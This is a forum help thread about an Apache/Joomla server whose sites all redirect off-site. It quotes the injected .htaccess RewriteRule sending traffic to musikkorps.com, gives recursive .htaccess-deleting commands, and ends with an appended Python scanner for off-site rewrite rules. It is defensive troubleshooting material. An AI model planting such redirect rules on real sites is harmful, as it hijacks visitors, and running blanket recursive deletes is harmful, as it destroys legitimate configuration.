Solved

I was hacked - apache -webhosting

Posted on 2010-08-18
15
1,402 Views
Last Modified: 2012-05-10
Hi,

I have all websites on my server redirected to nonsense IP address.

1. It is not DNS, since I have my clients on different registrars
2. It is not MySQL, because even simple pages are redirected
3. DNS ping from my domains gives me correct = my IP address

Heeeelp, please urgently or I am dead.
0
Comment
Question by:jbmd
15 Comments
 
LVL 7

Accepted Solution

by:
Milind Koyande earned 250 total points
ID: 33462036
Hello,

I would suggest you check your website pages, as it might be possible that someone injected malicious scripts in them. Also scan your server for viruses or any backdoor.
0
 

Author Comment

by:jbmd
ID: 33462066
I checked my folders in my Inetpub  and noticed that all folders have the fresh date 18 August 2: and so.
0
 

Author Comment

by:jbmd
ID: 33462080
I am finding this file: .htaccess with this inside:

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://musikkorps.com/mainfile.php

the file is in apache, am searching for more
0

 

Author Comment

by:jbmd
ID: 33462100
This file is everywhere in my inetpub folders. I am removing it, but how can I prevent it for the next time?
0
 

Author Comment

by:jbmd
ID: 33462131
QUESTION: since it is endless amount of this file spread in my inetpub directory, what is the crucial location, i.e. where should I go first to remove it so as the websites will function again?
0
 

Author Comment

by:jbmd
ID: 33462229
Ok, the answer is to remove it from the www root.

ANOTHER QUESTION:
Is there a PHP script available I can use to delete .htaccess files from today's date in one step?
0
 
LVL 3

Expert Comment

by:captainmish
ID: 33462542
To prevent this particular attack happening again, the easy fix is to add "AllowOverride None" to your Apache config; this will prevent Apache from using .htaccess files. If you do not use .htaccess files anywhere and want to delete them, you could just use a bash script to remove any (though it would be better to have all directories as read only for the Apache user):

# find and remove all .htaccess files under /var/www
find /var/www/ -name '.htaccess' -exec rm {} \;

To make your directories read only, you could chmod ugo-w {directory} (add -R to make it recursive and change all directories). Some apps will need a few directories to be writeable, e.g. for cache, uploads etc., so be careful when changing directory permissions.

Have a look at http://httpd.apache.org/docs/current/misc/security_tips.html for some other good security tips.
0
 

Author Comment

by:jbmd
ID: 33462586
Unfortunately I use Joomla with SEF-URL for almost all my clients, so .htaccess is inevitable.
0
 

Author Comment

by:jbmd
ID: 33462672
I have Windows OS, so what is a shell command for removing .htaccess from inetpub?
0
 
LVL 3

Expert Comment

by:csalaski
ID: 33462683
Have you checked Joomla and any of the makers of the plugins for patches to address security issues?
0
 
LVL 3

Expert Comment

by:captainmish
ID: 33462794
On Windows you could make a batch file that runs

REM replace with inetpub or your webroot path
cd /d \your\web\root || exit /b 1
del /S .htaccess

This will recursively delete all .htaccess files (I have not tested this as I don't have a Windows computer to play with, so try it first where it won't destroy things!). You could then add this as a scheduled task to run every day/hour etc.
0
 
LVL 3

Assisted Solution

by:captainmish
captainmish earned 250 total points
ID: 33462806
You could write the htaccess stuff into the virtual host configurations for apache, instead of using htaccess files, it sounds like these may have been overwritten anyway, so it may be time for restoring your backups. Another way around it would be to restore the .htaccess files, then use windows file permissions to remove write access to them. If you cannot avoid htaccess files, restore and permission is the only way I can think of to get around this.
0
 

Author Comment

by:jbmd
ID: 33463682
csalaski: -> it happened also on freshly installed joomla
0
 

Author Comment

by:jbmd
ID: 33463729
Is there a way to forbid overwriting .htaccess in the general config of Apache?
(I have Windows).

I do not want to do it on Windows folder level manually since I have a lot of files.
0
 
LVL 3

Assisted Solution

by:captainmish
captainmish earned 250 total points
ID: 33463909
Not sure about a way to make htaccess read only at Apache level, and it probably won't help as the exploit will have used a shell escape (file system level) to write to those files. You could just do a Windows search for .htaccess starting at the inetpub level, select all, and make read only?
0
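
Because the Joomla sites in this thread need their own .htaccess files, a blanket delete also removes legitimate rewrite rules. The sketch below is an added example, not code from any poster: it flags only .htaccess files whose RewriteRule sends requests to a host outside your own sites, renames them for later inspection, and clears the write bits on a file you keep. The function names, the `own_hosts` set, the `.quarantined` suffix and the Joomla-style sample rule are assumptions; Python is used so the same script runs on Windows and Linux.

```python
import re
import tempfile
from pathlib import Path

# "RewriteRule <pattern> <scheme>://<authority>..."; directive names are case-insensitive.
RULE = re.compile(
    r'^[ \t]*RewriteRule[ \t]+\S+[ \t]+"?[a-z][a-z0-9+.-]*://([^/\s"?#]+)', re.I | re.M)

def external_hosts(text, own_hosts):
    """Hosts of absolute-URL rewrite targets that are not one of our own sites."""
    found = set()
    for authority in RULE.findall(text):
        host = authority.rsplit("@", 1)[-1].split(":")[0].lower()  # drop userinfo, port
        if host not in own_hosts:
            found.add(host)
    return sorted(found)

def scan(webroot, own_hosts):
    """Map each .htaccess under webroot that redirects off-site to its hosts."""
    hits = {}
    for path in Path(webroot).rglob("*"):
        if path.is_file() and path.name.lower() == ".htaccess":
            hosts = external_hosts(path.read_text(errors="replace"), own_hosts)
            if hosts:
                hits[path] = hosts
    return hits

def quarantine(path):
    """Rename instead of deleting, so the file survives as evidence."""
    return path.replace(path.with_name(path.name + ".quarantined"))

def lock(path):
    """Clear the write bits; on Windows this sets the read-only attribute."""
    path.chmod(path.stat().st_mode & ~0o222)

def demo():
    """Constructed tree: the injected rule from the thread plus a Joomla-style file."""
    root = Path(tempfile.mkdtemp())
    (root / "site1").mkdir()
    bad, good = root / ".htaccess", root / "site1" / ".htaccess"
    bad.write_text("RewriteEngine On\nRewriteBase /\n"
                   "RewriteRule ^(.*)? http://musikkorps.com/mainfile.php\n")
    good.write_text("RewriteEngine On\nRewriteRule .* index.php [L]\n")  # constructed
    hits = scan(root, own_hosts={"www.example.com"})  # own_hosts is an assumption
    moved = [quarantine(p) for p in hits]
    lock(good)
    return hits, moved, good

if __name__ == "__main__":
    print(demo())
```

Run `scan()` on its own first and review the hits before calling `quarantine()`; a read-only flag does not stop a process that runs with the rights to change file attributes.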
